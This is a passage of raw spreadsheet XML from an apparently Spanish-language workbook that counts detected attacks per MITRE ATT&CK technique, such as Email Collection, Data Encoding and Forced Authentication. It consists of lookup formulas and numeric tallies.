      <c r="F27" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (15)</v>
      </c>
      <c r="G27" s="292">
        <v>1</v>
      </c>
      <c r="H27" s="322">
        <v>1</v>
      </c>
      <c r="I27" s="322">
        <v>0</v>
      </c>
      <c r="J27" s="12">
        <v>1</v>
      </c>
      <c r="K27" s="13">
        <v>1</v>
      </c>
      <c r="L27" s="394">
        <v>1</v>
      </c>
      <c r="M27" s="322">
        <v>0</v>
      </c>
      <c r="N27" s="322">
        <v>0</v>
      </c>
      <c r="O27" s="322">
        <v>0</v>
      </c>
      <c r="P27" s="12">
        <v>0</v>
      </c>
      <c r="Q27" s="13">
        <v>0</v>
      </c>
      <c r="R27" s="394">
        <v>0</v>
      </c>
      <c r="S27" s="292">
        <v>1</v>
      </c>
      <c r="T27" s="322">
        <v>1</v>
      </c>
      <c r="U27" s="322">
        <v>0</v>
      </c>
      <c r="V27" s="12">
        <v>1</v>
      </c>
      <c r="W27" s="13">
        <v>1</v>
      </c>
      <c r="X27" s="394">
        <v>1</v>
      </c>
      <c r="Y27" s="392">
        <v>11</v>
      </c>
      <c r="Z27" s="392">
        <v>5</v>
      </c>
      <c r="AA27" s="322">
        <v>0</v>
      </c>
      <c r="AB27" s="392">
        <v>5</v>
      </c>
      <c r="AC27" s="16">
        <v>1</v>
      </c>
      <c r="AD27" s="394">
        <v>2</v>
      </c>
      <c r="AE27" s="392">
        <v>28</v>
      </c>
      <c r="AF27" s="392">
        <v>20</v>
      </c>
      <c r="AG27" s="322">
        <v>0</v>
      </c>
      <c r="AH27" s="392">
        <v>18</v>
      </c>
      <c r="AI27" s="16">
        <v>1</v>
      </c>
      <c r="AJ27" s="394">
        <v>4</v>
      </c>
      <c r="AK27" s="392">
        <v>39</v>
      </c>
      <c r="AL27" s="392">
        <v>25</v>
      </c>
      <c r="AM27" s="322">
        <v>0</v>
      </c>
      <c r="AN27" s="392">
        <v>23</v>
      </c>
      <c r="AO27" s="16">
        <v>1</v>
      </c>
      <c r="AP27" s="394">
        <v>4</v>
      </c>
      <c r="AQ27" s="292">
        <v>0</v>
      </c>
      <c r="AR27" s="322">
        <v>0</v>
      </c>
      <c r="AS27" s="322">
        <v>0</v>
      </c>
      <c r="AT27" s="12">
        <v>0</v>
      </c>
      <c r="AU27" s="13">
        <v>0</v>
      </c>
      <c r="AV27" s="394">
        <v>0</v>
      </c>
      <c r="AW27" s="392">
        <v>1</v>
      </c>
      <c r="AX27" s="392">
        <v>1</v>
      </c>
      <c r="AY27" s="322">
        <v>0</v>
      </c>
      <c r="AZ27" s="4">
        <v>1</v>
      </c>
      <c r="BA27" s="16">
        <v>1</v>
      </c>
      <c r="BB27" s="394">
        <v>1</v>
      </c>
      <c r="BC27" s="292">
        <v>2</v>
      </c>
      <c r="BD27" s="322">
        <v>2</v>
      </c>
      <c r="BE27" s="322">
        <v>0</v>
      </c>
      <c r="BF27" s="12">
        <v>2</v>
      </c>
      <c r="BG27" s="13">
        <v>1</v>
      </c>
      <c r="BH27" s="394">
        <v>2</v>
      </c>
      <c r="BI27" s="292">
        <v>0</v>
      </c>
      <c r="BJ27" s="322">
        <v>0</v>
      </c>
      <c r="BK27" s="322">
        <v>0</v>
      </c>
      <c r="BL27" s="12">
        <v>0</v>
      </c>
      <c r="BM27" s="13">
        <v>0</v>
      </c>
      <c r="BN27" s="394">
        <v>0</v>
      </c>
      <c r="BO27" s="292">
        <v>11</v>
      </c>
      <c r="BP27" s="322">
        <v>10</v>
      </c>
      <c r="BQ27" s="322">
        <v>0</v>
      </c>
      <c r="BR27" s="12">
        <v>0</v>
      </c>
      <c r="BS27" s="12">
        <v>6</v>
      </c>
      <c r="BT27" s="13">
        <v>1</v>
      </c>
      <c r="BU27" s="394">
        <v>8</v>
      </c>
      <c r="BV27" s="292">
        <v>4</v>
      </c>
      <c r="BW27" s="322">
        <v>1</v>
      </c>
      <c r="BX27" s="322">
        <v>0</v>
      </c>
      <c r="BY27" s="12">
        <v>1</v>
      </c>
      <c r="BZ27" s="13">
        <v>1</v>
      </c>
      <c r="CA27" s="394">
        <v>1</v>
      </c>
      <c r="CB27" s="292">
        <v>9</v>
      </c>
      <c r="CC27" s="322">
        <v>2</v>
      </c>
      <c r="CD27" s="322">
        <v>0</v>
      </c>
      <c r="CE27" s="12">
        <v>1</v>
      </c>
      <c r="CF27" s="12">
        <v>1</v>
      </c>
      <c r="CG27" s="13">
        <v>1</v>
      </c>
      <c r="CH27" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:86" ht="15" customHeight="1">
      <c r="A28" s="4">
        <f t="shared" si="0"/>
        <v>26</v>
      </c>
      <c r="B28" s="4" t="str">
        <f>IFERROR(VLOOKUP(A28,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1114</v>
      </c>
      <c r="C28" s="493" t="str">
        <f>IFERROR(VLOOKUP(B28,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Email Collection</v>
      </c>
      <c r="D28" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B28)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E28" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F28" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (10)</v>
      </c>
      <c r="G28" s="292">
        <v>7</v>
      </c>
      <c r="H28" s="322">
        <v>5</v>
      </c>
      <c r="I28" s="322">
        <v>0</v>
      </c>
      <c r="J28" s="12">
        <v>2</v>
      </c>
      <c r="K28" s="13">
        <v>1</v>
      </c>
      <c r="L28" s="394">
        <v>5</v>
      </c>
      <c r="M28" s="322">
        <v>19</v>
      </c>
      <c r="N28" s="322">
        <v>4</v>
      </c>
      <c r="O28" s="322">
        <v>0</v>
      </c>
      <c r="P28" s="12">
        <v>1</v>
      </c>
      <c r="Q28" s="13">
        <v>1</v>
      </c>
      <c r="R28" s="394">
        <v>4</v>
      </c>
      <c r="S28" s="292">
        <v>26</v>
      </c>
      <c r="T28" s="322">
        <v>9</v>
      </c>
      <c r="U28" s="322">
        <v>0</v>
      </c>
      <c r="V28" s="12">
        <v>3</v>
      </c>
      <c r="W28" s="13">
        <v>1</v>
      </c>
      <c r="X28" s="394">
        <v>5</v>
      </c>
      <c r="Y28" s="392">
        <v>16</v>
      </c>
      <c r="Z28" s="392">
        <v>14</v>
      </c>
      <c r="AA28" s="322">
        <v>0</v>
      </c>
      <c r="AB28" s="392">
        <v>6</v>
      </c>
      <c r="AC28" s="16">
        <v>1</v>
      </c>
      <c r="AD28" s="394">
        <v>9</v>
      </c>
      <c r="AE28" s="392">
        <v>39</v>
      </c>
      <c r="AF28" s="392">
        <v>22</v>
      </c>
      <c r="AG28" s="322">
        <v>0</v>
      </c>
      <c r="AH28" s="392">
        <v>16</v>
      </c>
      <c r="AI28" s="16">
        <v>1</v>
      </c>
      <c r="AJ28" s="394">
        <v>7</v>
      </c>
      <c r="AK28" s="392">
        <v>55</v>
      </c>
      <c r="AL28" s="392">
        <v>36</v>
      </c>
      <c r="AM28" s="322">
        <v>0</v>
      </c>
      <c r="AN28" s="392">
        <v>22</v>
      </c>
      <c r="AO28" s="16">
        <v>1</v>
      </c>
      <c r="AP28" s="394">
        <v>9</v>
      </c>
      <c r="AQ28" s="292">
        <v>0</v>
      </c>
      <c r="AR28" s="322">
        <v>0</v>
      </c>
      <c r="AS28" s="322">
        <v>0</v>
      </c>
      <c r="AT28" s="12">
        <v>0</v>
      </c>
      <c r="AU28" s="13">
        <v>0</v>
      </c>
      <c r="AV28" s="394">
        <v>0</v>
      </c>
      <c r="AW28" s="392">
        <v>0</v>
      </c>
      <c r="AX28" s="392">
        <v>0</v>
      </c>
      <c r="AY28" s="322">
        <v>0</v>
      </c>
      <c r="AZ28" s="4">
        <v>0</v>
      </c>
      <c r="BA28" s="16">
        <v>0</v>
      </c>
      <c r="BB28" s="394">
        <v>0</v>
      </c>
      <c r="BC28" s="292">
        <v>26</v>
      </c>
      <c r="BD28" s="322">
        <v>9</v>
      </c>
      <c r="BE28" s="322">
        <v>0</v>
      </c>
      <c r="BF28" s="12">
        <v>3</v>
      </c>
      <c r="BG28" s="13">
        <v>1</v>
      </c>
      <c r="BH28" s="394">
        <v>5</v>
      </c>
      <c r="BI28" s="292">
        <v>5</v>
      </c>
      <c r="BJ28" s="322">
        <v>2</v>
      </c>
      <c r="BK28" s="322">
        <v>0</v>
      </c>
      <c r="BL28" s="12">
        <v>2</v>
      </c>
      <c r="BM28" s="13">
        <v>1</v>
      </c>
      <c r="BN28" s="394">
        <v>1</v>
      </c>
      <c r="BO28" s="292">
        <v>12</v>
      </c>
      <c r="BP28" s="322">
        <v>9</v>
      </c>
      <c r="BQ28" s="322">
        <v>0</v>
      </c>
      <c r="BR28" s="12">
        <v>2</v>
      </c>
      <c r="BS28" s="12">
        <v>4</v>
      </c>
      <c r="BT28" s="13">
        <v>1</v>
      </c>
      <c r="BU28" s="394">
        <v>6</v>
      </c>
      <c r="BV28" s="292">
        <v>0</v>
      </c>
      <c r="BW28" s="322">
        <v>0</v>
      </c>
      <c r="BX28" s="322">
        <v>0</v>
      </c>
      <c r="BY28" s="12">
        <v>0</v>
      </c>
      <c r="BZ28" s="13">
        <v>0</v>
      </c>
      <c r="CA28" s="394">
        <v>0</v>
      </c>
      <c r="CB28" s="292">
        <v>4</v>
      </c>
      <c r="CC28" s="322">
        <v>4</v>
      </c>
      <c r="CD28" s="322">
        <v>0</v>
      </c>
      <c r="CE28" s="12">
        <v>0</v>
      </c>
      <c r="CF28" s="12">
        <v>3</v>
      </c>
      <c r="CG28" s="13">
        <v>1</v>
      </c>
      <c r="CH28" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="29" spans="1:86" ht="15" customHeight="1">
      <c r="A29" s="4">
        <f t="shared" si="0"/>
        <v>27</v>
      </c>
      <c r="B29" s="4" t="str">
        <f>IFERROR(VLOOKUP(A29,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1132</v>
      </c>
      <c r="C29" s="493" t="str">
        <f>IFERROR(VLOOKUP(B29,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Encoding</v>
      </c>
      <c r="D29" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B29)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E29" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F29" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (10)</v>
      </c>
      <c r="G29" s="292">
        <v>1</v>
      </c>
      <c r="H29" s="322">
        <v>1</v>
      </c>
      <c r="I29" s="322">
        <v>0</v>
      </c>
      <c r="J29" s="12">
        <v>1</v>
      </c>
      <c r="K29" s="13">
        <v>1</v>
      </c>
      <c r="L29" s="394">
        <v>1</v>
      </c>
      <c r="M29" s="322">
        <v>11</v>
      </c>
      <c r="N29" s="322">
        <v>11</v>
      </c>
      <c r="O29" s="322">
        <v>0</v>
      </c>
      <c r="P29" s="12">
        <v>3</v>
      </c>
      <c r="Q29" s="13">
        <v>1</v>
      </c>
      <c r="R29" s="394">
        <v>6</v>
      </c>
      <c r="S29" s="292">
        <v>12</v>
      </c>
      <c r="T29" s="322">
        <v>12</v>
      </c>
      <c r="U29" s="322">
        <v>0</v>
      </c>
      <c r="V29" s="12">
        <v>4</v>
      </c>
      <c r="W29" s="13">
        <v>1</v>
      </c>
      <c r="X29" s="394">
        <v>6</v>
      </c>
      <c r="Y29" s="392">
        <v>6</v>
      </c>
      <c r="Z29" s="392">
        <v>6</v>
      </c>
      <c r="AA29" s="322">
        <v>0</v>
      </c>
      <c r="AB29" s="392">
        <v>2</v>
      </c>
      <c r="AC29" s="16">
        <v>1</v>
      </c>
      <c r="AD29" s="394">
        <v>6</v>
      </c>
      <c r="AE29" s="392">
        <v>20</v>
      </c>
      <c r="AF29" s="392">
        <v>18</v>
      </c>
      <c r="AG29" s="322">
        <v>0</v>
      </c>
      <c r="AH29" s="392">
        <v>6</v>
      </c>
      <c r="AI29" s="16">
        <v>1</v>
      </c>
      <c r="AJ29" s="394">
        <v>6</v>
      </c>
      <c r="AK29" s="392">
        <v>26</v>
      </c>
      <c r="AL29" s="392">
        <v>24</v>
      </c>
      <c r="AM29" s="322">
        <v>0</v>
      </c>
      <c r="AN29" s="392">
        <v>8</v>
      </c>
      <c r="AO29" s="16">
        <v>1</v>
      </c>
      <c r="AP29" s="394">
        <v>6</v>
      </c>
      <c r="AQ29" s="292">
        <v>0</v>
      </c>
      <c r="AR29" s="322">
        <v>0</v>
      </c>
      <c r="AS29" s="322">
        <v>0</v>
      </c>
      <c r="AT29" s="12">
        <v>0</v>
      </c>
      <c r="AU29" s="13">
        <v>0</v>
      </c>
      <c r="AV29" s="394">
        <v>0</v>
      </c>
      <c r="AW29" s="392">
        <v>0</v>
      </c>
      <c r="AX29" s="392">
        <v>0</v>
      </c>
      <c r="AY29" s="322">
        <v>0</v>
      </c>
      <c r="AZ29" s="4">
        <v>0</v>
      </c>
      <c r="BA29" s="16">
        <v>0</v>
      </c>
      <c r="BB29" s="394">
        <v>0</v>
      </c>
      <c r="BC29" s="292">
        <v>12</v>
      </c>
      <c r="BD29" s="322">
        <v>12</v>
      </c>
      <c r="BE29" s="322">
        <v>0</v>
      </c>
      <c r="BF29" s="12">
        <v>4</v>
      </c>
      <c r="BG29" s="13">
        <v>1</v>
      </c>
      <c r="BH29" s="394">
        <v>6</v>
      </c>
      <c r="BI29" s="292">
        <v>2</v>
      </c>
      <c r="BJ29" s="322">
        <v>2</v>
      </c>
      <c r="BK29" s="322">
        <v>0</v>
      </c>
      <c r="BL29" s="12">
        <v>2</v>
      </c>
      <c r="BM29" s="13">
        <v>1</v>
      </c>
      <c r="BN29" s="394">
        <v>1</v>
      </c>
      <c r="BO29" s="292">
        <v>10</v>
      </c>
      <c r="BP29" s="322">
        <v>10</v>
      </c>
      <c r="BQ29" s="322">
        <v>0</v>
      </c>
      <c r="BR29" s="12">
        <v>2</v>
      </c>
      <c r="BS29" s="12">
        <v>3</v>
      </c>
      <c r="BT29" s="13">
        <v>1</v>
      </c>
      <c r="BU29" s="394">
        <v>9</v>
      </c>
      <c r="BV29" s="292">
        <v>0</v>
      </c>
      <c r="BW29" s="322">
        <v>0</v>
      </c>
      <c r="BX29" s="322">
        <v>0</v>
      </c>
      <c r="BY29" s="12">
        <v>0</v>
      </c>
      <c r="BZ29" s="13">
        <v>0</v>
      </c>
      <c r="CA29" s="394">
        <v>0</v>
      </c>
      <c r="CB29" s="292">
        <v>5</v>
      </c>
      <c r="CC29" s="322">
        <v>5</v>
      </c>
      <c r="CD29" s="322">
        <v>0</v>
      </c>
      <c r="CE29" s="12">
        <v>0</v>
      </c>
      <c r="CF29" s="12">
        <v>1</v>
      </c>
      <c r="CG29" s="13">
        <v>1</v>
      </c>
      <c r="CH29" s="394">
        <v>5</v>
      </c>
    </row>
    <row r="30" spans="1:86" ht="15" customHeight="1">
      <c r="A30" s="4">
        <f t="shared" si="0"/>
        <v>28</v>
      </c>
      <c r="B30" s="4" t="str">
        <f>IFERROR(VLOOKUP(A30,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1133</v>
      </c>
      <c r="C30" s="493" t="str">
        <f>IFERROR(VLOOKUP(B30,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>External Remote Services</v>
      </c>
      <c r="D30" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B30)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E30" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>32</v>
      </c>
      <c r="F30" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (32)</v>
      </c>
      <c r="G30" s="292">
        <v>0</v>
      </c>
      <c r="H30" s="322">
        <v>0</v>
      </c>
      <c r="I30" s="322">
        <v>0</v>
      </c>
      <c r="J30" s="12">
        <v>0</v>
      </c>
      <c r="K30" s="13">
        <v>0</v>
      </c>
      <c r="L30" s="394">
        <v>0</v>
      </c>
      <c r="M30" s="322">
        <v>0</v>
      </c>
      <c r="N30" s="322">
        <v>0</v>
      </c>
      <c r="O30" s="322">
        <v>0</v>
      </c>
      <c r="P30" s="12">
        <v>0</v>
      </c>
      <c r="Q30" s="13">
        <v>0</v>
      </c>
      <c r="R30" s="394">
        <v>0</v>
      </c>
      <c r="S30" s="292">
        <v>0</v>
      </c>
      <c r="T30" s="322">
        <v>0</v>
      </c>
      <c r="U30" s="322">
        <v>0</v>
      </c>
      <c r="V30" s="12">
        <v>0</v>
      </c>
      <c r="W30" s="13">
        <v>0</v>
      </c>
      <c r="X30" s="394">
        <v>0</v>
      </c>
      <c r="Y30" s="392">
        <v>18</v>
      </c>
      <c r="Z30" s="392">
        <v>8</v>
      </c>
      <c r="AA30" s="322">
        <v>0</v>
      </c>
      <c r="AB30" s="392">
        <v>3</v>
      </c>
      <c r="AC30" s="16">
        <v>1</v>
      </c>
      <c r="AD30" s="394">
        <v>8</v>
      </c>
      <c r="AE30" s="392">
        <v>4</v>
      </c>
      <c r="AF30" s="392">
        <v>3</v>
      </c>
      <c r="AG30" s="322">
        <v>0</v>
      </c>
      <c r="AH30" s="392">
        <v>2</v>
      </c>
      <c r="AI30" s="16">
        <v>1</v>
      </c>
      <c r="AJ30" s="394">
        <v>3</v>
      </c>
      <c r="AK30" s="392">
        <v>22</v>
      </c>
      <c r="AL30" s="392">
        <v>11</v>
      </c>
      <c r="AM30" s="322">
        <v>0</v>
      </c>
      <c r="AN30" s="392">
        <v>5</v>
      </c>
      <c r="AO30" s="16">
        <v>1</v>
      </c>
      <c r="AP30" s="394">
        <v>9</v>
      </c>
      <c r="AQ30" s="292">
        <v>0</v>
      </c>
      <c r="AR30" s="322">
        <v>0</v>
      </c>
      <c r="AS30" s="322">
        <v>0</v>
      </c>
      <c r="AT30" s="12">
        <v>0</v>
      </c>
      <c r="AU30" s="13">
        <v>0</v>
      </c>
      <c r="AV30" s="394">
        <v>0</v>
      </c>
      <c r="AW30" s="392">
        <v>14</v>
      </c>
      <c r="AX30" s="392">
        <v>5</v>
      </c>
      <c r="AY30" s="322">
        <v>0</v>
      </c>
      <c r="AZ30" s="4">
        <v>2</v>
      </c>
      <c r="BA30" s="16">
        <v>1</v>
      </c>
      <c r="BB30" s="394">
        <v>5</v>
      </c>
      <c r="BC30" s="292">
        <v>14</v>
      </c>
      <c r="BD30" s="322">
        <v>5</v>
      </c>
      <c r="BE30" s="322">
        <v>0</v>
      </c>
      <c r="BF30" s="12">
        <v>2</v>
      </c>
      <c r="BG30" s="13">
        <v>1</v>
      </c>
      <c r="BH30" s="394">
        <v>5</v>
      </c>
      <c r="BI30" s="292">
        <v>0</v>
      </c>
      <c r="BJ30" s="322">
        <v>0</v>
      </c>
      <c r="BK30" s="322">
        <v>0</v>
      </c>
      <c r="BL30" s="12">
        <v>0</v>
      </c>
      <c r="BM30" s="13">
        <v>0</v>
      </c>
      <c r="BN30" s="394">
        <v>0</v>
      </c>
      <c r="BO30" s="292">
        <v>32</v>
      </c>
      <c r="BP30" s="322">
        <v>30</v>
      </c>
      <c r="BQ30" s="322">
        <v>0</v>
      </c>
      <c r="BR30" s="12">
        <v>0</v>
      </c>
      <c r="BS30" s="12">
        <v>7</v>
      </c>
      <c r="BT30" s="13">
        <v>1</v>
      </c>
      <c r="BU30" s="394">
        <v>30</v>
      </c>
      <c r="BV30" s="292">
        <v>0</v>
      </c>
      <c r="BW30" s="322">
        <v>0</v>
      </c>
      <c r="BX30" s="322">
        <v>0</v>
      </c>
      <c r="BY30" s="12">
        <v>0</v>
      </c>
      <c r="BZ30" s="13">
        <v>0</v>
      </c>
      <c r="CA30" s="394">
        <v>0</v>
      </c>
      <c r="CB30" s="292">
        <v>0</v>
      </c>
      <c r="CC30" s="322">
        <v>0</v>
      </c>
      <c r="CD30" s="322">
        <v>0</v>
      </c>
      <c r="CE30" s="12">
        <v>0</v>
      </c>
      <c r="CF30" s="12">
        <v>0</v>
      </c>
      <c r="CG30" s="13">
        <v>0</v>
      </c>
      <c r="CH30" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:86" ht="15" customHeight="1">
      <c r="A31" s="4">
        <f t="shared" si="0"/>
        <v>29</v>
      </c>
      <c r="B31" s="4" t="str">
        <f>IFERROR(VLOOKUP(A31,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1176</v>
      </c>
      <c r="C31" s="493" t="str">
        <f>IFERROR(VLOOKUP(B31,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Software Extensions</v>
      </c>
      <c r="D31" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B31)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E31" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>217</v>
      </c>
      <c r="F31" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (217)</v>
      </c>
      <c r="G31" s="292">
        <v>0</v>
      </c>
      <c r="H31" s="322">
        <v>0</v>
      </c>
      <c r="I31" s="322">
        <v>0</v>
      </c>
      <c r="J31" s="12">
        <v>0</v>
      </c>
      <c r="K31" s="13">
        <v>0</v>
      </c>
      <c r="L31" s="394">
        <v>0</v>
      </c>
      <c r="M31" s="322">
        <v>0</v>
      </c>
      <c r="N31" s="322">
        <v>0</v>
      </c>
      <c r="O31" s="322">
        <v>0</v>
      </c>
      <c r="P31" s="12">
        <v>0</v>
      </c>
      <c r="Q31" s="13">
        <v>0</v>
      </c>
      <c r="R31" s="394">
        <v>0</v>
      </c>
      <c r="S31" s="292">
        <v>0</v>
      </c>
      <c r="T31" s="322">
        <v>0</v>
      </c>
      <c r="U31" s="322">
        <v>0</v>
      </c>
      <c r="V31" s="12">
        <v>0</v>
      </c>
      <c r="W31" s="13">
        <v>0</v>
      </c>
      <c r="X31" s="394">
        <v>0</v>
      </c>
      <c r="Y31" s="392">
        <v>224</v>
      </c>
      <c r="Z31" s="392">
        <v>215</v>
      </c>
      <c r="AA31" s="322">
        <v>0</v>
      </c>
      <c r="AB31" s="392">
        <v>2</v>
      </c>
      <c r="AC31" s="16">
        <v>1</v>
      </c>
      <c r="AD31" s="394">
        <v>215</v>
      </c>
      <c r="AE31" s="392">
        <v>216</v>
      </c>
      <c r="AF31" s="392">
        <v>214</v>
      </c>
      <c r="AG31" s="322">
        <v>0</v>
      </c>
      <c r="AH31" s="392">
        <v>3</v>
      </c>
      <c r="AI31" s="16">
        <v>1</v>
      </c>
      <c r="AJ31" s="394">
        <v>212</v>
      </c>
      <c r="AK31" s="392">
        <v>440</v>
      </c>
      <c r="AL31" s="392">
        <v>429</v>
      </c>
      <c r="AM31" s="322">
        <v>0</v>
      </c>
      <c r="AN31" s="392">
        <v>5</v>
      </c>
      <c r="AO31" s="16">
        <v>1</v>
      </c>
      <c r="AP31" s="394">
        <v>215</v>
      </c>
      <c r="AQ31" s="292">
        <v>0</v>
      </c>
      <c r="AR31" s="322">
        <v>0</v>
      </c>
      <c r="AS31" s="322">
        <v>0</v>
      </c>
      <c r="AT31" s="12">
        <v>0</v>
      </c>
      <c r="AU31" s="13">
        <v>0</v>
      </c>
      <c r="AV31" s="394">
        <v>0</v>
      </c>
      <c r="AW31" s="392">
        <v>12</v>
      </c>
      <c r="AX31" s="392">
        <v>3</v>
      </c>
      <c r="AY31" s="322">
        <v>0</v>
      </c>
      <c r="AZ31" s="4">
        <v>1</v>
      </c>
      <c r="BA31" s="16">
        <v>1</v>
      </c>
      <c r="BB31" s="394">
        <v>3</v>
      </c>
      <c r="BC31" s="292">
        <v>12</v>
      </c>
      <c r="BD31" s="322">
        <v>3</v>
      </c>
      <c r="BE31" s="322">
        <v>0</v>
      </c>
      <c r="BF31" s="12">
        <v>1</v>
      </c>
      <c r="BG31" s="13">
        <v>1</v>
      </c>
      <c r="BH31" s="394">
        <v>3</v>
      </c>
      <c r="BI31" s="292">
        <v>0</v>
      </c>
      <c r="BJ31" s="322">
        <v>0</v>
      </c>
      <c r="BK31" s="322">
        <v>0</v>
      </c>
      <c r="BL31" s="12">
        <v>0</v>
      </c>
      <c r="BM31" s="13">
        <v>0</v>
      </c>
      <c r="BN31" s="394">
        <v>0</v>
      </c>
      <c r="BO31" s="292">
        <v>429</v>
      </c>
      <c r="BP31" s="322">
        <v>429</v>
      </c>
      <c r="BQ31" s="322">
        <v>0</v>
      </c>
      <c r="BR31" s="12">
        <v>0</v>
      </c>
      <c r="BS31" s="12">
        <v>4</v>
      </c>
      <c r="BT31" s="13">
        <v>1</v>
      </c>
      <c r="BU31" s="394">
        <v>217</v>
      </c>
      <c r="BV31" s="292">
        <v>0</v>
      </c>
      <c r="BW31" s="322">
        <v>0</v>
      </c>
      <c r="BX31" s="322">
        <v>0</v>
      </c>
      <c r="BY31" s="12">
        <v>0</v>
      </c>
      <c r="BZ31" s="13">
        <v>0</v>
      </c>
      <c r="CA31" s="394">
        <v>0</v>
      </c>
      <c r="CB31" s="292">
        <v>212</v>
      </c>
      <c r="CC31" s="322">
        <v>212</v>
      </c>
      <c r="CD31" s="322">
        <v>0</v>
      </c>
      <c r="CE31" s="12">
        <v>0</v>
      </c>
      <c r="CF31" s="12">
        <v>1</v>
      </c>
      <c r="CG31" s="13">
        <v>1</v>
      </c>
      <c r="CH31" s="394">
        <v>212</v>
      </c>
    </row>
    <row r="32" spans="1:86" ht="15" customHeight="1">
      <c r="A32" s="4">
        <f t="shared" si="0"/>
        <v>30</v>
      </c>
      <c r="B32" s="4" t="str">
        <f>IFERROR(VLOOKUP(A32,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1187</v>
      </c>
      <c r="C32" s="493" t="str">
        <f>IFERROR(VLOOKUP(B32,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Forced Authentication</v>
      </c>
      <c r="D32" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B32)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E32" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>11</v>
      </c>
      <c r="F32" s="579" t="str">
        <f t="shared" si="1"/>
        <v>2 (11)</v>
      </c>
      <c r="G32" s="292">
        <v>0</v>
      </c>
      <c r="H32" s="322">
        <v>0</v>
      </c>
      <c r="I32" s="322">
        <v>0</v>
      </c>
      <c r="J32" s="12">
        <v>0</v>
      </c>
      <c r="K32" s="13">
        <v>0</v>
      </c>
      <c r="L32" s="394">
        <v>0</v>
      </c>
      <c r="M32" s="322">
        <v>0</v>
      </c>
      <c r="N32" s="322">
        <v>0</v>
      </c>
      <c r="O32" s="322">
        <v>0</v>
      </c>
      <c r="P32" s="12">
        <v>0</v>
      </c>
      <c r="Q32" s="13">
        <v>0</v>
      </c>
      <c r="R32" s="394">
        <v>0</v>
      </c>
      <c r="S32" s="292">
        <v>0</v>
      </c>
      <c r="T32" s="322">
        <v>0</v>
      </c>
      <c r="U32" s="322">
        <v>0</v>
      </c>
      <c r="V32" s="12">
        <v>0</v>
      </c>
      <c r="W32" s="13">
        <v>0</v>
      </c>
      <c r="X32" s="394">
        <v>0</v>
      </c>
      <c r="Y32" s="392">
        <v>15</v>
      </c>
      <c r="Z32" s="392">
        <v>15</v>
      </c>
      <c r="AA32" s="322">
        <v>0</v>
      </c>
      <c r="AB32" s="392">
        <v>5</v>
      </c>
      <c r="AC32" s="16">
        <v>1</v>
      </c>
      <c r="AD32" s="394">
        <v>3</v>
      </c>
      <c r="AE32" s="392">
        <v>37</v>
      </c>
      <c r="AF32" s="392">
        <v>35</v>
      </c>
      <c r="AG32" s="322">
        <v>0</v>
      </c>
      <c r="AH32" s="392">
        <v>10</v>
      </c>
      <c r="AI32" s="16">
        <v>1</v>
      </c>
      <c r="AJ32" s="394">
        <v>10</v>
      </c>
      <c r="AK32" s="392">
        <v>52</v>
      </c>
      <c r="AL32" s="392">
        <v>50</v>
      </c>
      <c r="AM32" s="322">
        <v>0</v>
      </c>
      <c r="AN32" s="392">
        <v>15</v>
      </c>
      <c r="AO32" s="16">
        <v>1</v>
      </c>
      <c r="AP32" s="394">
        <v>10</v>
      </c>
      <c r="AQ32" s="292">
        <v>0</v>
      </c>
      <c r="AR32" s="322">
        <v>0</v>
      </c>
      <c r="AS32" s="322">
